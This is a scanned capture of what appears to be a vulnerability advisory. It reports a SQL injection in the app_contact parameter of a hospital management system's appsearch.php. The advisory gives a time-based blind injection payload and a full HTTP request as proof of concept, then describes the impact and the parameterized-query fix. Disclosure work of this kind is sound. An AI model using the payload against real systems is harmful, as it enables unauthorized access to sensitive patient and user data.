purring-climb-52a.notion.site
Open in
urlscan Pro
2606:4700:4400::ac40:9bf7
Public Scan
Submitted URL: https://www.notion.so/SQL-Injection-vulnerability-in-app_contact-parameter-on-appsearch-php-directory-2e3daa8975164ee1...
Effective URL: https://purring-climb-52a.notion.site/SQL-Injection-vulnerability-in-app_contact-parameter-on-appsearch-php-directory-2e3daa8975164ee1...
Submission: On October 05 via api from IE — Scanned from US
Effective URL: https://purring-climb-52a.notion.site/SQL-Injection-vulnerability-in-app_contact-parameter-on-appsearch-php-directory-2e3daa8975164ee1...
Submission: On October 05 via api from IE — Scanned from US
Form analysis 0 forms found in the DOM
Text Content
SQL Injection vulnerability in app_contact parameter on /appsearch.php directory. Search Duplicate Try Notion SQL INJECTION VULNERABILITY IN APP_CONTACT PARAMETER ON /APPSEARCH.PHP DIRECTORY. DESCRIPTION Markdown Copy SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd March 21, 2021, allows attackers to sql commands via app_contact parameter on /appsearch.php directory. HOW TO EXPLOIT Markdown Copy URL: http://localhost/Hospital-Management-System/appsearch.php Parameter: app_contact Payload: '%2b(select*from(select(sleep(20)))a)%2b' HTTP REQUEST: Markdown Copy POST /Hospital/appsearch.php HTTP/1.1 Host: 192.168.7.105:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 41 Origin: http://192.168.7.105:8080 Connection: close Referer: http://192.168.7.105:8080/Hospital/admin-panel1.php Cookie: PHPSESSID=rllrv34sf52l6ff6p36ahq7eki Upgrade-Insecure-Requests: 1 app_contact=Test'%2b(select*from(select(sleep(20)))a)%2b'&app_search_submit=Search the server will sleep for 20 seconds. SCREENSHOT FOR POC: GITHUB PERMALINK Markdown Copy https://github.com/kishan0725/Hospital-Management-System/blob/4770d740f2512693ef8fd9aa10a8d17f79fad9bd/appsearch.php#L16 IMPACT FOR THIS VULNERABILITY: Markdown Copy Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server. Compromise Users' Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers. HOW TO FIX THIS VULNERABILITY: Markdown Copy The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. Reference: Portswigger.